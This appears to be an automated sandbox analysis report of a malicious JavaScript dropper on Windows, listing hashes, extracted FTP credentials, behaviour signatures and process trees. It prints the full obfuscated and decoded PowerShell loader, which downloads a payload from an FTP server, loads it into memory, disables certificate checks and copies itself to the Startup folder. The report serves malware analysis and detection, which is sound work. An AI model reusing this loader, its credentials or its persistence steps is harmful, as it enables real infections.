Analysis
-
max time kernel
146s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23-09-2024 17:40
Static task
static1
Behavioral task
behavioral1
Sample
6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js
Resource
win10v2004-20240802-en
General
-
Target
6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js
-
Size
11KB
-
MD5
e1c347b8f89a739b8ac859399fc5dd2f
-
SHA1
5ca91197785030f2072ed083b456e544d39b5ce3
-
SHA256
6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1
-
SHA512
d259433ba8a8f61c3909243630b94ff1ae32ee833858375d350a08ef99f6bedb1434116de9bc56293ae7fbc60249eba21be871cb35ff50d73d684eec9a535b0a
-
SSDEEP
192:QuJSWVs9A/4AzIZgROnqoM2CIi3UooDGcCLcYa6iNrpaNfbc1NgNd+tchvtk7alH:7sUVzywNoMNI+oyHcY4hpaVc7gmtc9lH
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Extracted
Protocol: ftp- Host:
ftp.desckvbrat.com.br - Port:
21 - Username:
desckvbrat1 - Password:
developerpro21578Jp@@
Signatures
-
Blocklisted process makes network request 26 IoCs
flow pid Process 6 4864 powershell.exe 16 4864 powershell.exe 19 4864 powershell.exe 20 4864 powershell.exe 25 4864 powershell.exe 29 4864 powershell.exe 30 4864 powershell.exe 33 4864 powershell.exe 44 4864 powershell.exe 45 4864 powershell.exe 46 4864 powershell.exe 47 4864 powershell.exe 50 4864 powershell.exe 52 4864 powershell.exe 53 4864 powershell.exe 54 4864 powershell.exe 55 4864 powershell.exe 58 4864 powershell.exe 63 4864 powershell.exe 64 4864 powershell.exe 65 4864 powershell.exe 66 4864 powershell.exe 67 4864 powershell.exe 68 4864 powershell.exe 69 4864 powershell.exe 70 4864 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js cmd.exe -
pid Process 5020 powershell.exe 4864 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 5020 powershell.exe 5020 powershell.exe 4864 powershell.exe 4864 powershell.exe 4864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5020 powershell.exe Token: SeDebugPrivilege 4864 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3552 wrote to memory of 5020 3552 wscript.exe 82 PID 3552 wrote to memory of 5020 3552 wscript.exe 82 PID 5020 wrote to memory of 4864 5020 powershell.exe 84 PID 5020 wrote to memory of 4864 5020 powershell.exe 84 PID 4864 wrote to memory of 2860 4864 powershell.exe 89 PID 4864 wrote to memory of 2860 4864 powershell.exe 89 PID 4864 wrote to memory of 5112 4864 powershell.exe 90 PID 4864 wrote to memory of 5112 4864 powershell.exe 90 PID 4864 wrote to memory of 796 4864 powershell.exe 94 PID 4864 wrote to memory of 796 4864 powershell.exe 94 PID 4864 wrote to memory of 4828 4864 powershell.exe 95 PID 4864 wrote to memory of 4828 4864 powershell.exe 95 PID 4864 wrote to memory of 5080 4864 powershell.exe 96 PID 4864 wrote to memory of 5080 4864 powershell.exe 96 PID 4864 wrote to memory of 4908 4864 powershell.exe 97 PID 4864 wrote to memory of 4908 4864 powershell.exe 97 PID 4864 wrote to memory of 3804 4864 powershell.exe 98 PID 4864 wrote to memory of 3804 4864 powershell.exe 98 PID 4864 wrote to memory of 2940 4864 powershell.exe 99 PID 4864 wrote to memory of 2940 4864 powershell.exe 99 PID 4864 wrote to memory of 1940 4864 powershell.exe 101 PID 4864 wrote to memory of 1940 4864 powershell.exe 101 PID 4864 wrote to memory of 3140 4864 powershell.exe 102 PID 4864 wrote to memory of 3140 4864 powershell.exe 102 PID 4864 wrote to memory of 3332 4864 powershell.exe 104 PID 4864 wrote to memory of 3332 4864 powershell.exe 104 PID 4864 wrote to memory of 4508 4864 powershell.exe 105 PID 4864 wrote to memory of 4508 4864 powershell.exe 105 PID 4864 wrote to memory of 1456 4864 powershell.exe 106 PID 4864 wrote to memory of 1456 4864 powershell.exe 106 PID 4864 wrote to memory of 452 4864 powershell.exe 107 PID 4864 wrote to memory of 452 4864 powershell.exe 107 PID 4864 wrote to memory of 3084 4864 powershell.exe 108 PID 4864 wrote to memory of 3084 4864 powershell.exe 108 PID 4864 wrote to memory of 4240 4864 powershell.exe 109 PID 4864 wrote to memory of 4240 4864 powershell.exe 109 PID 4864 wrote to memory of 1492 4864 powershell.exe 110 PID 4864 wrote to memory of 1492 4864 powershell.exe 110 PID 4864 wrote to memory of 1384 4864 powershell.exe 111 PID 4864 wrote to memory of 1384 4864 powershell.exe 111 PID 4864 wrote to memory of 2252 4864 powershell.exe 112 PID 4864 wrote to memory of 2252 4864 powershell.exe 112 PID 4864 wrote to memory of 1020 4864 powershell.exe 113 PID 4864 wrote to memory of 1020 4864 powershell.exe 113 PID 4864 wrote to memory of 4072 4864 powershell.exe 114 PID 4864 wrote to memory of 4072 4864 powershell.exe 114 PID 4864 wrote to memory of 8 4864 powershell.exe 115 PID 4864 wrote to memory of 8 4864 powershell.exe 115 PID 4864 wrote to memory of 3724 4864 powershell.exe 116 PID 4864 wrote to memory of 3724 4864 powershell.exe 116 PID 4864 wrote to memory of 4276 4864 powershell.exe 117 PID 4864 wrote to memory of 4276 4864 powershell.exe 117 PID 4864 wrote to memory of 1484 4864 powershell.exe 118 PID 4864 wrote to memory of 1484 4864 powershell.exe 118 PID 4864 wrote to memory of 3684 4864 powershell.exe 119 PID 4864 wrote to memory of 3684 4864 powershell.exe 119 PID 4864 wrote to memory of 2720 4864 powershell.exe 120 PID 4864 wrote to memory of 2720 4864 powershell.exe 120 PID 4864 wrote to memory of 3184 4864 powershell.exe 121 PID 4864 wrote to memory of 3184 4864 powershell.exe 121 PID 4864 wrote to memory of 3304 4864 powershell.exe 122 PID 4864 wrote to memory of 3304 4864 powershell.exe 122 PID 4864 wrote to memory of 2072 4864 powershell.exe 123 PID 4864 wrote to memory of 2072 4864 powershell.exe 123
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nbgdE = 'JA㍿lAEgASg㍿jAGsAIAA9ACAAJA㍿oAG8Acw㍿0AC4AVg㍿lAHIAcw㍿pAG8AbgAuAE0AYQ㍿qAG8AcgAuAEUAcQ㍿1AGEAbA㍿zACgAMgApADsASQ㍿mACAAKAAgACQAZQ㍿IAEoAYw㍿rACAAKQAgAHsAJA㍿NAGoATA㍿qAHAAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEkATwAuAFAAYQ㍿0AGgAXQA6ADoARw㍿lAHQAVA㍿lAG0AcA㍿QAGEAdA㍿oACgAKQA7AGQAZQ㍿sACAAKAAkAE0Aag㍿MAGoAcAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApADsAJA㍿zAGkAVg㍿wAFAAIAA9ACAAJw㍿oAHQAdA㍿wAHMAOgAvAC8AZA㍿yAGkAdg㍿lAC4AZw㍿vAG8AZw㍿sAGUALg㍿jAG8AbQAvAHUAYwA/AGUAeA㍿wAG8Acg㍿0AD0AZA㍿vAHcAbg㍿sAG8AYQ㍿kACYAaQ㍿kAD0AJwA7ACQAUQ㍿EAGYARw㍿vACAAPQAgACQAZQ㍿uAHYAOg㍿QAFIATw㍿DAEUAUw㍿TAE8AUg㍿fAEEAUg㍿DAEgASQ㍿UAEUAQw㍿UAFUAUg㍿FAC4AQw㍿vAG4AdA㍿hAGkAbg㍿zACgAJwA2ADQAJwApADsAaQ㍿mACAAKAAgACQAUQ㍿EAGYARw㍿vACAAKQAgAHsAJA㍿zAGkAVg㍿wAFAAIAA9ACAAKAAkAHMAaQ㍿WAHAAUAAgACsAIAAnAFcAMQAxADIAQQ㍿kAFAAZg㍿JADAAUA㍿DADcAaA㍿iAHMAYw㍿pAF8ANQ㍿fADAAXw㍿lAFUANw㍿OAHcATQ㍿aAGgAZgA0AHgAJwApACAAOw㍿9AGUAbA㍿zAGUAIA㍿7ACQAcw㍿pAFYAcA㍿QACAAPQAgACgAJA㍿zAGkAVg㍿wAFAAIAArACAAJwAxAGIAcg㍿qADUAag㍿xAG4AcQ㍿SAHgAQw㍿EADYAVg㍿oAGYAaA㍿㍿AG4AMg㍿yAGMAVg㍿mAHMAUg㍿vADcARAA4AGcAcgAnACkAIAA7AH0AOwAkAE4AeQ㍿CAFkAYwAgAD0AIAAoACAATg㍿lAHcALQ㍿PAGIAag㍿lAGMAdAAgAE4AZQ㍿0AC4AVw㍿lAGIAQw㍿sAGkAZQ㍿uAHQAIAApACAAOwAkAE4AeQ㍿CAFkAYwAuAEUAbg㍿jAG8AZA㍿pAG4AZwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AVA㍿lAHgAdAAuAEUAbg㍿jAG8AZA㍿pAG4AZw㍿dADoAOg㍿VAFQARgA4ACAAOwAkAE4AeQ㍿CAFkAYwAuAEQAbw㍿3AG4AbA㍿vAGEAZA㍿GAGkAbA㍿lACgAJA㍿VAFIATA㍿LAEIALAAgACQATQ㍿qAEwAag㍿wACAAKwAgACcAXA㍿VAHAAdw㍿pAG4ALg㍿tAHMAdQAnACkAIAA7ACQAQQ㍿VAHIARw㍿GACAAPQAgACgAIAAnAEMAOg㍿cAFUAcw㍿lAHIAcw㍿cACcAIAArACAAWw㍿FAG4Adg㍿pAHIAbw㍿uAG0AZQ㍿uAHQAXQA6ADoAVQ㍿zAGUAcg㍿OAGEAbQ㍿lACAAKQA7AEkAeg㍿qAEEAUQAgAD0AIAAoACAAJA㍿NAGoATA㍿qAHAAIAArACAAJw㍿cAFUAcA㍿3AGkAbgAuAG0Acw㍿1ACcAIAApACAAOwAgAHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAHcAdQ㍿zAGEALg㍿lAHgAZQAgAEkAeg㍿qAEEAUQAgAC8AcQ㍿1AGkAZQ㍿0ACAALw㍿uAG8Acg㍿lAHMAdA㍿hAHIAdAAgADsAIA㍿DAG8AcA㍿5AC0ASQ㍿0AGUAbQAgACcAJQ㍿EAEMAUA㍿KAFUAJQAnACAALQ㍿EAGUAcw㍿0AGkAbg㍿hAHQAaQ㍿vAG4AIAAoACAAJA㍿㍿AFUAcg㍿HAEYAIAArACAAJw㍿cAEEAcA㍿wAEQAYQ㍿0AGEAXA㍿SAG8AYQ㍿tAGkAbg㍿nAFwATQ㍿pAGMAcg㍿vAHMAbw㍿mAHQAXA㍿XAGkAbg㍿kAG8Adw㍿zAFwAUw㍿0AGEAcg㍿0ACAATQ㍿lAG4AdQ㍿cAFAAcg㍿vAGcAcg㍿hAG0Acw㍿cAFMAdA㍿hAHIAdA㍿1AHAAJwAgACkAIAAtAGYAbw㍿yAGMAZQAgADsAcA㍿vAHcAZQ㍿yAHMAaA㍿lAGwAbAAuAGUAeA㍿lACAALQ㍿jAG8AbQ㍿tAGEAbg㍿kACAAJw㍿zAGwAZQ㍿lAHAAIAAxADgAMAAnADsAIA㍿zAGgAdQ㍿0AGQAbw㍿3AG4ALg㍿lAHgAZQAgAC8AcgAgAC8AdAAgADAAIAAvAGYAIA㍿9AGUAbA㍿zAGUAIA㍿7AFsAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAFMAZQ㍿yAHYAaQ㍿jAGUAUA㍿vAGkAbg㍿0AE0AYQ㍿uAGEAZw㍿lAHIAXQA6ADoAUw㍿lAHIAdg㍿lAHIAQw㍿lAHIAdA㍿pAGYAaQ㍿jAGEAdA㍿lAFYAYQ㍿sAGkAZA㍿hAHQAaQ㍿vAG4AQw㍿hAGwAbA㍿iAGEAYw㍿rACAAPQAgAHsAJA㍿0AHIAdQ㍿lAH0AOw㍿bAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿TAGUAcg㍿2AGkAYw㍿lAFAAbw㍿pAG4AdA㍿NAGEAbg㍿hAGcAZQ㍿yAF0AOgA6AFMAZQ㍿jAHUAcg㍿pAHQAeQ㍿QAHIAbw㍿0AG8AYw㍿vAGwAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAE4AZQ㍿0AC4AUw㍿lAGMAdQ㍿yAGkAdA㍿5AFAAcg㍿vAHQAbw㍿jAG8AbA㍿UAHkAcA㍿lAF0AOgA6AFQAbA㍿zADEAMgA7ACQAZg㍿nAEgAWQ㍿LACAAPQAgACgATg㍿lAHcALQ㍿PAGIAag㍿lAGMAdAAgAE4AZQ㍿0AC4AVw㍿lAGIAQw㍿sAGkAZQ㍿uAHQAKQA7ACQAZg㍿nAEgAWQ㍿LAC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿UAGUAeA㍿0AC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nAF0AOgA6AFUAVA㍿GADgAOwAkAGYAZw㍿IAFkASwAuAEMAcg㍿lAGQAZQ㍿uAHQAaQ㍿hAGwAcwAgAD0AIA㍿uAGUAdwAtAG8AYg㍿qAGUAYw㍿0ACAAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAE4AZQ㍿0AHcAbw㍿yAGsAQw㍿yAGUAZA㍿lAG4AdA㍿pAGEAbAAoACcAZA㍿lAHMAYw㍿rAHYAYg㍿yAGEAdAAxACcALAAnAGQAZQ㍿2AGUAbA㍿vAHAAZQ㍿yAHAAcg㍿vADIAMQA1ADcAOA㍿KAHAAQA㍿AACcAKQA7ACQAeA㍿NAEEAbQ㍿KACAAPQAgACQAZg㍿nAEgAWQ㍿LAC4ARA㍿vAHcAbg㍿sAG8AYQ㍿kAFMAdA㍿yAGkAbg㍿nACgAIAAnAGYAdA㍿wADoALwAvAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQAMQ㍿AAGYAdA㍿wAC4AZA㍿lAHMAYw㍿rAHYAYg㍿yAGEAdAAuAGMAbw㍿tAC4AYg㍿yAC8AVQ㍿wAGMAcg㍿5AHAAdA㍿lAHIALwAwADIALw㍿EAEwATAAwADEALg㍿0AHgAdAAnACAAKQA7ACQAZg㍿nAEgAWQ㍿LAC4AZA㍿pAHMAcA㍿vAHMAZQAoACkAOwAkAGYAZw㍿IAFkASwAgAD0AIAAoAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACkAOwAkAGYAZw㍿IAFkASwAuAEUAbg㍿jAG8AZA㍿pAG4AZwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AVA㍿lAHgAdAAuAEUAbg㍿jAG8AZA㍿pAG4AZw㍿dADoAOg㍿VAFQARgA4ADsAJA㍿4AE0AQQ㍿tAEoAIAA9ACAAJA㍿mAGcASA㍿ZAEsALg㍿EAG8Adw㍿uAGwAbw㍿hAGQAUw㍿0AHIAaQ㍿uAGcAKAAgACQAeA㍿NAEEAbQ㍿KACAAKQA7AFsAQg㍿5AHQAZQ㍿bAF0AXQAgACQAUg㍿YAGkAVg㍿qAF8AWQ㍿sAHQASA㍿LACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿DAG8Abg㍿2AGUAcg㍿0AF0AOgA6AEYAcg㍿vAG0AQg㍿hAHMAZQA2ADQAUw㍿0AHIAaQ㍿uAGcAKAAgACQAeA㍿NAEEAbQ㍿KAC4AUg㍿lAHAAbA㍿hAGMAZQAoACAAJwCTIToAkyEnACAALAAgACcAQQAnACAAKQAgACkAOw㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AQQ㍿wAHAARA㍿vAG0AYQ㍿pAG4AXQA6ADoAQw㍿1AHIAcg㍿lAG4AdA㍿EAG8AbQ㍿hAGkAbgAuAEwAbw㍿hAGQAKAAgACQAUg㍿YAGkAVg㍿qAF8AWQ㍿sAHQASA㍿LACAAKQAuAEcAZQ㍿0AFQAeQ㍿wAGUAKAAgACcAQw㍿sAGEAcw㍿zAEwAaQ㍿iAHIAYQ㍿yAHkAMwAuAEMAbA㍿hAHMAcwAxACcAIAApAC4ARw㍿lAHQATQ㍿lAHQAaA㍿vAGQAKAAgACcAcA㍿yAEYAVg㍿JACcAIAApAC4ASQ㍿uAHYAbw㍿rAGUAKAAkAG4AdQ㍿sAGwALAAgAFsAbw㍿iAGoAZQ㍿jAHQAWw㍿dAF0AIAAoACAAJwAwAC8AUA㍿XAE0ARQ㍿0AC8AZAAvAGUAZQAuAGUAdA㍿zAGEAcAAvAC8AOg㍿zAHAAdA㍿0AGgAJwAgACwAIAAnACUARA㍿DAFAASg㍿VACUAJwAsACAAJw㍿GAGEAbA㍿zAGUAJwAgACkAIAApADsAfQA7AA==';$nbgdE = $nbgdE.replace('㍿','B') ;$nbgdE = [System.Convert]::FromBase64String( $nbgdE ) ;;;$nbgdE = [System.Text.Encoding]::Unicode.GetString( $nbgdE ) ;$nbgdE = $nbgdE.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js') ;powershell $nbgdE2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$eHJck = $host.Version.Major.Equals(2);If ( $eHJck ) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $QDfGo ) {$siVpP = ($siVpP + 'W112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$NyBYc = ( New-Object Net.WebClient ) ;$NyBYc.Encoding = [System.Text.Encoding]::UTF8 ;$NyBYc.DownloadFile($URLKB, $MjLjp + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MjLjp + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$fgHYK = (New-Object Net.WebClient);$fgHYK.Encoding = [System.Text.Encoding]::UTF8;$fgHYK.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$xMAmJ = $fgHYK.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$fgHYK.dispose();$fgHYK = (New-Object Net.WebClient);$fgHYK.Encoding = [System.Text.Encoding]::UTF8;$xMAmJ = $fgHYK.DownloadString( $xMAmJ );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $xMAmJ.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '0/PWMEt/d/ee.etsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js', 'False' ) );};"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵
- Drops startup file
PID:2860
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:5112
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:796
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:4828
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:5080
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:4908
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:3804
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:2940
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:1940
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:3140
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:3332
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:4508
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:1456
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:452
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:3084
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:4240
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:1492
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:1384
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:2252
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:1020
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:4072
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:8
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:3724
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:4276
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:1484
-
-
